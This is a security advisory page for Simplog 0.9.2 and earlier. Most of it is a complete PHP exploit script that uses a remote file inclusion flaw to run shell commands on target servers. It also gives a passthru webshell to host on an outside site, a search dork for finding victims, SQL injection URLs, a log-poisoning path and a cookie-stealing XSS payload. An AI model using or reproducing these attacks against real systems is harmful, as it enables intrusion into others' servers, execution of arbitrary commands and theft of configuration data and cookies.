Simplog <=0.9.2 multiple vulnerabilities

2006.04.13
Risk: Medium
Local: Yes
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/php -q -d short_open_tag=on <? echo "Simplog <= 0.9.2 "s" remote cmmnds xctnrn"; echo "by rgod rgod (at) autistici (dot) org [email concealed]rn"; echo "site: http://retrogod.altervista.orgrnrn"; echo "dork: intext:"Powered by simplog"rnrn"; if ($argc<5) { echo "Usage: php ".$argv[0]." host path location cmd OPTIONSrn"; echo "host: target server (ip/hostname)rn"; echo "path: path to simplogrn"; echo "location: an arbitrary location with the code to includern"; echo "cmd: a shell commandrn"; echo "Options:rn"; echo " -p[port]: specify a port other than 80rn"; echo " -P[ip:port]: specify a proxyrn"; echo "Examples:rn"; echo "php ".$argv[0]." localhost /simplog/ http://somehost.com ls -larn"; echo "php ".$argv[0]." localhost /simplog/ http://somehost.com/subdir ls -la -p81rn"; echo "php ".$argv[0]." localhost / http://somehost.com cat ./../config.php -P1.1.1.1:80rnrn"; echo "note, you need this code in http://somehost.com/suntzu.html:rn"; echo "<?phprn"; echo "if (get_magic_quotes_gpc()){$_REQUEST["cmd"]=stripslashes($_REQUEST["c md"]);}rn"; echo "ini_set("max_execution_time",0);rn"; echo "echo "*delim*";rn"; echo "passthru($_REQUEST["cmd"]);rn"; echo "echo "*delim*";rn"; echo "?>rn"; die; } /* software site: http://www.simplog.org/ description: "Simplog provides an easy way for users to add blogging capabilities to their existing websites. Simplog is written in PHP and compatible with multiple databases. Simplog also features an RSS/Atom aggregator/reader. Powerful, yet simple......." i) vulnerable code in doc/index.php at lines: ... <?php if(isset($_REQUEST['s'])) { include($_REQUEST['s'].".html"); } ?> ... nice code, isn't it? :) poc: http://[target]/[path]/doc/index.php?cmd=ls%20-la&s=http://somehost.com/ suntzu (but you can submit arguments even trough cookies or POST data...) or: http://[target]/[path]/doc/index.php?s=../../../../var/httpd/logs/error_ log%00 ii) http://[target]/[path]/index.php?blogid=[sql] http://[target]/[path]/archive.php?blogid=[sql] http://[target]/[path]/archive.php?m=[sql] http://[target]/[path]/archive.php?y=[sql] iii) http://[target]/[path]/adodb/server.php?sql=[sql] http://[target]/[path]/adodb/tests/tmssql.php?do=phpinfo iv) xss: http://[target]/[path]/login.php?btag=<script>alert(document.cookie)</sc ript> this is the exploit for i), works with allow_url_fopen = On */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";} } return $exa."rn".$result; } $proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "rn".$html; } $host=$argv[1]; $path=$argv[2]; $loc=$argv[3]; if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/')) {die("Check the path, it must begin and end with a trailing slashrn");} $port=80; $proxy=""; $cmd=""; for ($i=4; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) { $cmd.=" ".$argv[$i]; } if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } $cmd=urlencode($cmd); if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} $packet ="GET ".$p."doc/index.php HTTP/1.0rn"; $packet.="User-Agent: Googlebot/2.1rn"; $packet.="Host: ".$host."rn"; $packet.="Cookie: s=".$loc."%2fsuntzu; cmd=".$cmd.";rn"; //through cookies, log this :) $packet.="Connection: Closernrn"; #debug #echo quick_dump($packet); sendpacketii($packet); if (strstr($html,"*delim*")) {$temp=explode("*delim*",$html); echo "Exploit succeeded...rnrn"; echo $temp[1]; } else { #debug echo $html."rn"; echo "Exploit failed..."; } ?> original url: http://retrogod.altervista.org/simplog_092_incl_xpl.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top